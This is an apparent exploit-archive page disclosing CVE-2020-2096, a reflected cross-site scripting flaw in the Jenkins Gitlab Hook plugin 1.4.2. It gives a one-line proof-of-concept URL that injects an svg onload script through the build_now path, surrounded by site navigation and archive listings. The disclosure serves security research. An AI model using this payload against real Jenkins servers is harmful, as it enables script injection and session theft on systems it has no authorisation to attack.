Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting: Posted Jan 16, 2020; Authored by Ai Ho; Jenkins Gitlab Hook plugin version 1.4.2 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2020-2096; SHA-256 | 38931217cabd4d17c01cf04d878ac4d8c49d23973f783f5ba2fd442676454822; Download | Favorite | View

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Top Authors In Last 30 Days

Red Hat 291 files
Ubuntu 63 files
LiquidWorm 29 files
indoushka 20 files
Debian 19 files
Apple 10 files
Google Security Research 7 files
Chokri Hammedi 3 files
Jann Horn 3 files
Emiliano Febbi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,154)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,795)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,227)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,962)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Share This

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems